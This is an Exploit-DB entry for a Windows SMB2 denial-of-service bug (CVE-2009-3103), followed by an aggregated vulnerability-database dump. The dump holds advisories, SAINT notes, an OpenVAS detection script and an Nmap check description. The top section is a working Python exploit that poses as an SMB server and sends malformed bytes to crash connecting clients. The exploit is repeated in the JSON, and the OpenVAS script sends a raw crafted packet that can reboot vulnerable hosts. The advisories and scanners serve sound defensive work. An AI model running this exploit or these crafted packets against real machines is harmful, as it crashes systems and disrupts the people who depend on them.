ID EDB-ID:12524 Type exploitdb Reporter Jelmer de Hen Modified 2010-05-07T00:00:00
Description
Windows SMB2 Negotiate Protocol (0x72) Response DOS. CVE-2009-3103. Dos exploit for windows platform
#!/usr/bin/python
# === EDIT â this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent GaffiĂŠ, i did not know this but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
import socket,sys,time
print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at http://h.ackack.net/?p=387"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.accept()
print "[+] "+str(addr)+" is trying to make connection to us over port 445"
while 1:
new_packet = smbconn.recv(1024)
print "[+] Waiting for a negotiate request packet"
if new_packet[8]=="r":
print "[+] Received the negotiate request packet injecting the 4 bytes now..."
smbconn.send("\x00\x00\x00\x01")
break
print "[+] Closing connection... This is part of the exploit"
smbconn.close()
print "[+] Done, if all went good then the box on the other side crashed"
{"id": "EDB-ID:12524", "hash": "db18f382d0bc55efff0cb544e41cc157", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Windows SMB2 Negotiate Protocol 0x72 Response DoS", "description": "Windows SMB2 Negotiate Protocol (0x72) Response DOS. CVE-2009-3103. Dos exploit for windows platform", "published": "2010-05-07T00:00:00", "modified": "2010-05-07T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/12524/", "reporter": "Jelmer de Hen", "references": [], "cvelist": ["CVE-2009-3103"], "lastseen": "2016-02-01T16:42:10", "history": [], "viewCount": 31, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/12524/", "sourceData": "#!/usr/bin/python\r\n\r\n# === EDIT \u00e2\u0080\u0093 this exploit appears to be exactly the same one of one which was already found\r\n# and fixed notified by Laurent Gaffi\u0102\u0160, i did not know this but his blog post can be found here:\r\n# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html\r\n\r\nimport socket,sys,time\r\n\r\nprint \"Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600\"\r\nprint \"Written by Jelmer de Hen\"\r\nprint \"Published at http://h.ackack.net/?p=387\"\r\nsmb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsmb.bind((\"\", 445))\r\nsmb.listen(1)\r\nsmbconn, addr = smb.accept()\r\nprint \"[+] \"+str(addr)+\" is trying to make connection to us over port 445\"\r\nwhile 1:\r\n\tnew_packet = smbconn.recv(1024)\r\n\tprint \"[+] Waiting for a negotiate request packet\"\r\n\tif new_packet[8]==\"r\":\r\n\t\tprint \"[+] Received the negotiate request packet injecting the 4 bytes now...\"\r\n\t\tsmbconn.send(\"\\x00\\x00\\x00\\x01\")\r\n\t\tbreak\r\nprint \"[+] Closing connection... This is part of the exploit\"\r\nsmbconn.close()\r\nprint \"[+] Done, if all went good then the box on the other side crashed\"\r\n\r\n\r\n", "osvdbidlist": ["57799"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-10-13T11:34:33", "references": ["http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1", "http://www.microsoft.com/technet/security/advisory/975497.mspx", "http://www.securityfocus.com/archive/1/506327/100/0/threaded", "http://isc.sans.org/diary.html?storyid=7093", "http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html", "http://www.kb.cert.org/vuls/id/135940", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0090.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/53090", "http://www.securityfocus.com/archive/1/506300/100/0/threaded", "http://blog.48bits.com/?p=510", "http://www.securitytracker.com/id?1022848", "http://www.exploit-db.com/exploits/9594", "http://www.securityfocus.com/bid/36299", "http://www.us-cert.gov/cas/techalerts/TA09-286A.html", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050"], "description": "Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka \"SMBv2 Negotiation Vulnerability.\" NOTE: some of these details are obtained from third party information.", "edition": 5, "reporter": "NVD", "published": "2009-09-08T18:30:00", "title": "CVE-2009-3103", "type": "cve", "enchantments": {"score": {"modified": "2018-10-13T11:34:33", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6489", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6489"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-3103"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6489", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6489"}], "modified": "2018-10-12T17:52:09", "cpe": ["cpe:/o:microsoft:windows_vista", "cpe:/o:microsoft:windows_vista::sp1", "cpe:/o:microsoft:windows_vista::sp2:x64", "cpe:/o:microsoft:windows_vista::sp1:x64", "cpe:/o:microsoft:windows_server_2008:::x64", "cpe:/o:microsoft:windows_server_2008:sp2:x64", "cpe:/o:microsoft:windows_server_2008::sp2:itanium", "cpe:/o:microsoft:windows_server_2008", "cpe:/o:microsoft:windows_server_2008:sp2:x32", "cpe:/o:microsoft:windows_vista::sp2", "cpe:/o:microsoft:windows_server_2008:::itanium", "cpe:/o:microsoft:windows_server_2008:::x32"], "id": "CVE-2009-3103", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:34:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "Bugraq ID: 36299\r\nCVE ID\uff1aCVE-2009-3103\r\n\r\nMicrosoft windows\u662f\u4e00\u6b3e\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nMicrosoft windows SMB2\u662f\u65b0\u7248windows\u6346\u7ed1\u7684SMB\u534f\u8bae\u5b9e\u73b0\uff0cSRV2.SYS\u9a71\u52a8\u4e0d\u6b63\u786e\u5904\u7406\u53d1\u9001\u7ed9NEGOTIATE PROTOCOL REQUEST\u529f\u80fd\u7684\u7578\u5f62SMB\u5934\u5b57\u6bb5\u6570\u636e\uff0cNEGOTIATE PROTOCOL REQUEST\u662f\u5ba2\u6237\u7aef\u53d1\u9001\u7ed9SMB\u670d\u52a1\u5668\u7684\u7b2c\u4e00\u4e2aSMB\u67e5\u8be2\uff0c\u7528\u4e8e\u8bc6\u522bSMB\u8bed\u8a00\u5e76\u7528\u4e8e\u4e4b\u540e\u7684\u901a\u4fe1\u3002\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u5efaProcess Id High\u5934\u5b57\u6bb5\u4e2d\u5305\u542b\u6709\u201c&\u201d\u5b57\u7b26\u7684SMB\u62a5\u6587\u5e76\u53d1\u9001\u7ed9\u53d7\u5f71\u54cd\u7cfb\u7edf\uff0c\u53ef\u5bfc\u81f4\u7cfb\u7edf\u84dd\u5c4f\u6b7b\u673a\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\u6b64\u6f0f\u6d1e\u65e0\u9700\u9a8c\u8bc1\u4ea4\u4e92\u3002\n\nMicrosoft Windows Vista x64 Edition SP2\r\nMicrosoft Windows Vista x64 Edition SP1\r\nMicrosoft Windows Vista x64 Edition 0\r\nMicrosoft Windows Vista Ultimate 64-bit edition SP2\r\nMicrosoft Windows Vista Ultimate 64-bit edition SP1\r\nMicrosoft Windows Vista Ultimate 64-bit edition 0\r\nMicrosoft Windows Vista Home Premium 64-bit edition SP2\r\nMicrosoft Windows Vista Home Premium 64-bit edition SP1\r\nMicrosoft Windows Vista Home Premium 64-bit edition 0\r\nMicrosoft Windows Vista Home Basic 64-bit edition SP2\r\nMicrosoft Windows Vista Home Basic 64-bit edition SP1\r\nMicrosoft Windows Vista Home Basic 64-bit edition 0\r\nMicrosoft Windows Vista Enterprise 64-bit edition SP2\r\nMicrosoft Windows Vista Enterprise 64-bit edition SP1\r\nMicrosoft Windows Vista Enterprise 64-bit edition 0\r\nMicrosoft Windows Vista Business 64-bit edition SP2\r\nMicrosoft Windows Vista Business 64-bit edition SP1\r\nMicrosoft Windows Vista Business 64-bit edition 0\r\nMicrosoft Windows Vista Ultimate SP2\r\nMicrosoft Windows Vista Ultimate SP1\r\nMicrosoft Windows Vista Ultimate\r\nMicrosoft Windows Vista Home Premium SP2\r\nMicrosoft Windows Vista Home Premium SP1\r\nMicrosoft Windows Vista Home Premium\r\nMicrosoft Windows Vista Home Basic SP2\r\nMicrosoft Windows Vista Home Basic SP1\r\nMicrosoft Windows Vista Home Basic\r\nMicrosoft Windows Vista Enterprise SP2\r\nMicrosoft Windows Vista Enterprise SP1\r\nMicrosoft Windows Vista Enterprise\r\nMicrosoft Windows Vista Business SP2\r\nMicrosoft Windows Vista Business SP1\r\nMicrosoft Windows Vista Business\r\nMicrosoft Windows Server 2008 Standard Edition SP2\r\nMicrosoft Windows Server 2008 Standard Edition 0\r\nMicrosoft Windows Server 2008 for x64-based Systems SP2\r\nMicrosoft Windows Server 2008 for x64-based Systems 0\r\nMicrosoft Windows Server 2008 for Itanium-based Systems SP2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems 0\r\nMicrosoft Windows Server 2008 for 32-bit Systems SP2\r\nMicrosoft Windows Server 2008 for 32-bit Systems 0\r\nMicrosoft Windows Server 2008 Enterprise Edition SP2\r\nMicrosoft Windows Server 2008 Enterprise Edition 0\r\nMicrosoft Windows Server 2008 Datacenter Edition SP2\r\nMicrosoft Windows Server 2008 Datacenter Edition 0\r\nMicrosoft Windows 7 RC\r\nMicrosoft Windows 7 beta\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u4f9b\u5e94\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\uff1a\r\nMicrosoft Windows Server 2008 for x64-based Systems 0\r\nMicrosoft Security Update for Windows Server 2008 x64 Edition (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=aff6f9c7-4a72 -48f2-b750-204d796c7daa\r\nMicrosoft Windows Server 2008 for Itanium-based Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 for Itanium-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=7b70108b-7f59 -4898-ab4e-76be990de878\r\nMicrosoft Windows Server 2008 for 32-bit Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=ff6bfcf3-76c9 -4c45-b57d-22f94458dd6e\r\nMicrosoft Windows Vista x64 Edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6 -4942-80c9-7808b14cb6b5\r\nMicrosoft Windows Server 2008 for x64-based Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 x64 Edition (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=aff6f9c7-4a72 -48f2-b750-204d796c7daa\r\nMicrosoft Windows Server 2008 for Itanium-based Systems 0\r\nMicrosoft Security Update for Windows Server 2008 for Itanium-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=7b70108b-7f59 -4898-ab4e-76be990de878\r\nMicrosoft Windows Vista x64 Edition SP2\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6 -4942-80c9-7808b14cb6b5\r\nMicrosoft Windows Server 2008 for 32-bit Systems 0\r\nMicrosoft Security Update for Windows Server 2008 (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=ff6bfcf3-76c9 -4c45-b57d-22f94458dd6e\r\nMicrosoft Windows Vista x64 Edition SP1\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6 -4942-80c9-7808b14cb6b5", "reporter": "Root", "published": "2009-10-14T00:00:00", "title": "Microsoft Windows SMBv2\u534f\u5546\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(MS09-050)", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-10-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12474", "id": "SSV:12474", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}], "saint": [{"lastseen": "2016-12-14T16:58:06", "references": [], "edition": 1, "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. \n\n### Platforms\n\nWindows Vista \n \n\n", "reporter": "SAINT Corporation", "published": "2010-09-20T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Windows SMB2 buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "modified": "2010-09-20T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "id": "SAINT:214C8A991DD5F17EF7735584268D3CB3", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:57", "references": [], "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. \n\n### Platforms\n\nWindows Vista \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2010-09-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "Windows SMB2 buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "modified": "2010-09-20T00:00:00", "id": "SAINT:1E9A2A7C6228790D4846596C8DA04D49", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:14", "references": [], "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. \n\n### Platforms\n\nWindows Vista \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2010-09-20T00:00:00", "title": "Windows SMB2 buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "modified": "2010-09-20T00:00:00", "id": "SAINT:30D79D30A079078FDE7DB3C5C56D3681", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-12-27T22:20:47", "references": ["http://www.microsoft.com/windows/products/windowsvista/default.mspx", "http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx", "http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html", "http://www.kb.cert.org/vuls/id/135940", "http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx", "http://www.microsoft.com/windows/windows-7/", "https://docs.microsoft.com/de-de/security-updates/securitybulletins/2009/ms09-050", "http://blog.48bits.com/?p=510#more-510", "http://www.securityfocus.com/archive/1/506327", "http://www.securityfocus.com/archive/1/506300", "http://www.securityfocus.com/bid/36299"], "pluginID": "1361412562310100283", "description": "Microsoft Windows is prone to a remote code-execution vulnerability\n when processing the protocol headers for the Server Message Block\n (SMB) Negotiate Protocol Request.\n\n NOTE: Reportedly, for this issue to be exploitable, file sharing must\n be enabled.", "edition": 4, "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-10-01T00:00:00", "title": "Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3103"], "modified": "2018-12-27T00:00:00", "id": "OPENVAS:1361412562310100283", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ms_smb2_highid.nasl 12886 2018-12-27 10:03:51Z asteins $\n#\n# Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100283\");\n script_version(\"$Revision: 12886 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-27 11:03:51 +0100 (Thu, 27 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-01 18:57:31 +0200 (Thu, 01 Oct 2009)\");\n script_bugtraq_id(36299);\n script_cve_id(\"CVE-2009-3103\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_KILL_HOST);\n script_family(\"Windows\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(445);\n script_tag(name:\"summary\", value:\"Microsoft Windows is prone to a remote code-execution vulnerability\n when processing the protocol headers for the Server Message Block\n (SMB) Negotiate Protocol Request.\n\n NOTE: Reportedly, for this issue to be exploitable, file sharing must\n be enabled.\");\n\n script_tag(name:\"vuldetect\", value:\"Opens a TCP socket to send a crafted request and checks if\n the host responds to a second request after a few seconds.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to execute code with SYSTEM-level\n privileges; failed exploit attempts will likely cause denial-of-\n service conditions.\");\n\n script_tag(name:\"affected\", value:\"Windows 7 RC, Vista and 2008 Server are vulnerable, other versions may\n also be affected.\n\n NOTE: Reportedly, Windows XP and 2000 are not affected.\n\n UPDATE (September 9, 2009): Symantec has confirmed the issue on\n Windows Vista SP1 and Windows Server 2008.\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/36299\");\n script_xref(name:\"URL\", value:\"http://blog.48bits.com/?p=510#more-510\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/de-de/security-updates/securitybulletins/2009/ms09-050\");\n script_xref(name:\"URL\", value:\"http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/windows/windows-7/\");\n script_xref(name:\"URL\", value:\"http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/windows/products/windowsvista/default.mspx\");\n script_xref(name:\"URL\", value:\"http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/506300\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/506327\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/135940\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"solution\", value:\"Microsoft has released updates to fix the issue.\n Please see the references for more information.\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\n\nif(safe_checks())exit(0);\n\nport = 445;\nif(!get_port_state(port))exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\n\ndata = raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x53,0xc8,\n 0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xfe,\n 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,\n 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,\n 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,\n 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,\n 0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,\n 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4e,0x54,\n 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x32,0x2e,\n 0x30,0x30,0x32,0x00); # Tested against 2008 Server. A vulnerable Server doing a reboot. I'm not happy with that, but a the moment i have no idea how to detect this vulnerability without exploiting it.\n\nsend(socket: soc, data: data);\nclose(soc);\n\n# Increased sleep to avoid possible FPs\nsleep(10);\n\nsoc1 = open_sock_tcp(port);\n\nif(!soc1) {\n security_message(port:port);\n exit(0);\n} else {\n close(soc1);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-04T14:21:56", "references": [], "pluginID": "803571", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter 'unsafe', then scripts will run that are almost (or\ntotally) guaranteed to crash a vulnerable system; do NOT specify 'unsafe' in a production\nenvironment! And that isn't to say that non-unsafe scripts will not crash a system, they're just\nless likely to.\n\nIf you set the script parameter 'safe', then script will run that rarely or never crash a\nvulnerable system. No promises, though.\n\nMS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that can allow\nremote code execution. Checking for MS08-067 is very dangerous, as the check is likely to crash\nsystems. On a fairly wide scan conducted by Brandon Enright, we determined that on average, a\nvulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems,\n\n\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\n\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n\n- 'negotiate': [default] Use signatures if server supports them. \n\n- 'ignore': Never check server signatures. Not recommended. \n\n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\n\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)", "edition": 2, "reporter": "NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH", "published": "2013-02-28T00:00:00", "title": "Nmap NSE 6.01: smb-check-vulns", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Nmap NSE", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3103"], "modified": "2017-08-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=803571", "id": "OPENVAS:803571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap6_smb_check_vulns.nasl 7000 2017-08-24 11:51:46Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 